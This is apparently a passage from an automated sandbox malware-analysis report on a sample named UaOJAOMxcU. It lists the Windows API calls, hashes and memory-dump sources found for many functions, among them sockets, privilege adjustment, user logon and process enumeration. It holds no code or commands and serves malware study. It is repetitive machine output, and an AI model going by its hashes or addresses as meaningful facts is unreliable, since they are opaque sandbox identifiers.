                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                    • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                    • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                    • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                    APIs
                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                    • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                    • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                    • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                    • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                    • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                    • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                    • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                    • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                    • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                    • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocErrorLastProcess
                    • String ID:
                    • API String ID: 44706859-0
                    • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                    • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                    • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                    • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0046C432
                    • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • CoUninitialize.OLE32 ref: 0046C6B7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateInitializeInstanceUninitialize_memmove
                    • String ID: .lnk
                    • API String ID: 2683427295-24824748
                    • Opcode ID: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                    • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                    • Opcode Fuzzy Hash: 8be31365239305a4f0ecbc96338834b64287ccbcc385a5ffb8382792e3c7b4fb
                    • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                    • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                    • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                    • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                    • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                    • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                    • Opcode Fuzzy Hash: 1c9346bdc20ddc0196d8a7451d6206e56d34d46406b44e9c87b55d7262c0256e
                    • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                    • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                    • Opcode Fuzzy Hash: eef32c7583b458a7172a6c711d1ec7a4f2f7e3610f1f932fb94fc73443e575d2
                    • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                    • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                    • Opcode Fuzzy Hash: f5373d92f6f0dc30811b4af31ba5f0bb4595b0a53436f4c0864762cea70d04c2
                    • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                    • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                    • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                    • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                    APIs
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                    • GetLastError.KERNEL32 ref: 00458865
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                    • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                    • Opcode Fuzzy Hash: 11fd776744e65cad2fb0d65c8c6b7c288e777bf7a622f9fe62c50e0e4f52890d
                    • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                    • FreeSid.ADVAPI32(?), ref: 0045879B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                    • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                    • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                    • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                    APIs
                    • __time64.LIBCMT ref: 0046889B
                      • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                      • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0eL
                    • API String ID: 2893107130-3167399643
                    • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                    • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                    • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                    • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                    • FindClose.KERNEL32(00000000), ref: 0046C72B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                    • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 0047785B
                    • DeleteObject.GDI32(00000000), ref: 0047786D
                    • DestroyWindow.USER32 ref: 0047787B
